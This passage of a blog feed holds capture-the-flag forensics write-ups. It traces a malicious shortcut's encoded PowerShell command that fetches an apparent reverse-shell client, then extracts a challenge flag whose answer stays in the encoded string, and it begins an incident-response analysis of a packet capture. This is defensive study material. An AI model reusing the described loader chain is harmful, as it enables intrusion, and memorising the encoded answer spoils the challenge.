y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>&#128269; Step 5: Inspect the LNK File</strong></p><p>Viewing the shortcut's <strong>properties</strong>, we see a <strong>command</strong> pointing to PowerShell with a <strong>base64-encoded payload</strong>.</p><p>Initially, decoding didn&#8217;t give the full command&#8212;likely because changing the file type broke the formatting. So, we redownloaded the .lnk, <strong>renamed it to .exe</strong>, and opened it in <strong>PE Studio</strong> to recover the full encoded PowerShell command.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!N0QM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!N0QM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 424w, https://substackcdn.com/image/fetch/$s_!N0QM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 848w, https://substackcdn.com/image/fetch/$s_!N0QM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 1272w, https://substackcdn.com/image/fetch/$s_!N0QM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!N0QM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png" width="795" height="272" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:272,&quot;width&quot;:795,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:17722,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.byteberzerker.com/i/159864671?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!N0QM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 424w, https://substackcdn.com/image/fetch/$s_!N0QM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 848w, https://substackcdn.com/image/fetch/$s_!N0QM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 1272w, https://substackcdn.com/image/fetch/$s_!N0QM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F05f7987e-49f7-4d21-867f-85bed1ad674a_795x272.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vih5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vih5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 424w, https://substackcdn.com/image/fetch/$s_!vih5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 848w, https://substackcdn.com/image/fetch/$s_!vih5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 1272w, https://substackcdn.com/image/fetch/$s_!vih5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vih5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png" width="361" height="520" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:520,&quot;width&quot;:361,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:17260,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.byteberzerker.com/i/159864671?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vih5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 424w, https://substackcdn.com/image/fetch/$s_!vih5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 848w, https://substackcdn.com/image/fetch/$s_!vih5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 1272w, https://substackcdn.com/image/fetch/$s_!vih5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd60326f3-1814-4b5e-bff2-62ea933701a6_361x520.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TNrg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TNrg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 424w, https://substackcdn.com/image/fetch/$s_!TNrg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 848w, https://substackcdn.com/image/fetch/$s_!TNrg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 1272w, https://substackcdn.com/image/fetch/$s_!TNrg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TNrg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png" width="1445" height="393" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:393,&quot;width&quot;:1445,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!TNrg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 424w, https://substackcdn.com/image/fetch/$s_!TNrg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 848w, https://substackcdn.com/image/fetch/$s_!TNrg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 1272w, https://substackcdn.com/image/fetch/$s_!TNrg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe4290f4-18b7-4762-8a9b-4fc6838b8083_1445x393.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>&#129514; Step 6: Decoding with CyberChef</strong></p><p>Feeding the full base64 command into <strong>CyberChef</strong>, we uncover the actual PowerShell script. It&#8217;s downloading a file named client.py.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!EZfC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!EZfC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 424w, https://substackcdn.com/image/fetch/$s_!EZfC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 848w, https://substackcdn.com/image/fetch/$s_!EZfC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 1272w, https://substackcdn.com/image/fetch/$s_!EZfC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!EZfC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png" width="1278" height="633" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:633,&quot;width&quot;:1278,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!EZfC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 424w, https://substackcdn.com/image/fetch/$s_!EZfC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 848w, https://substackcdn.com/image/fetch/$s_!EZfC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 1272w, https://substackcdn.com/image/fetch/$s_!EZfC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F923f0f30-c1e0-4847-a84a-34e377b0024a_1278x633.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>&#128013; Step 7: Analyzing client.py</strong></p><p>We download client.py and inspect the code. The presence of a variable named meterpreter_data is a huge red flag&#8212;this is likely a <strong>reverse shell client</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Ucm2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Ucm2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 424w, https://substackcdn.com/image/fetch/$s_!Ucm2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 848w, https://substackcdn.com/image/fetch/$s_!Ucm2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 1272w, https://substackcdn.com/image/fetch/$s_!Ucm2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Ucm2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png" width="1456" height="471" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b987014b-fc4e-4eae-858c-b8540075822f_2526x817.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:471,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Ucm2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 424w, https://substackcdn.com/image/fetch/$s_!Ucm2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 848w, https://substackcdn.com/image/fetch/$s_!Ucm2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 1272w, https://substackcdn.com/image/fetch/$s_!Ucm2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb987014b-fc4e-4eae-858c-b8540075822f_2526x817.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>&#128272; Step 8: Extracting the Flag</strong></p><p>Within the script, we spot base64-encoded values. Starting with the <strong>key</strong>, we decode it:</p><p>import base64</p><p>key = base64.b64decode("SFRCezRQVF8yOF80bmRfbTFjcjBzMGZ0X3MzNHJjaD0xbjF0MTRsXzRjYzNzISF9Cg==")<br>print(key.decode())</p><p>This gives us:</p><p>HTB{FLAG HERE}</p><p>&#127937; <strong>Flag Captured!</strong></p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Silent Trap]]></title><description><![CDATA[Cyber Apocalypse 2025]]></description><link>https://www.byteberzerker.com/p/hackthebox-silent-trap</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-silent-trap</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Fri, 21 Mar 2025 21:30:58 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!o4Im!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Silent Trap: Incident Response Write-Up</strong></p><p><strong>Overview</strong></p><p>A catastrophic incident occurred in <em>Tales from Eldoria</em>, trapping thousands of players in the game. The cause? A sophisticated attack orchestrated by a mysterious entity named <strong>Malakar</strong>, who gained control over the developers' and sysadmins' systems. This write-up details the forensic analysis and steps taken to investigate, identify, and respond to the breach.</p><p></p><p>NOTE: The questions and answers cane be found at No. 6 in this list. No. 1-5 is on analysis techniques.</p><p><strong>1. Initial Steps</strong></p><ol><li><p>Downloaded and extracted all provided files on an <strong>isolated virtual machine</strong>.</p></li><li><p>Discovered a .pcap file among the provided artifacts.</p></li><li><p>Loaded the .pcap into <strong>NetworkMiner</strong> for analysis (chosen over Wireshark for ease of file extraction).</p></li></ol><p><strong>2. Network Forensics via NetworkMiner</strong></p><ul><li><p>NetworkMiner revealed a large volume of <strong>.eml</strong>, <strong>.zip</strong>, and <strong>.json</strong> files.</p></li><li><p>Extracted files were located in AssembledFiles/ under NetworkMiner's directory.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!o4Im!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!o4Im!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 424w, https://substackcdn.com/image/fetch/$s_!o4Im!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 848w, 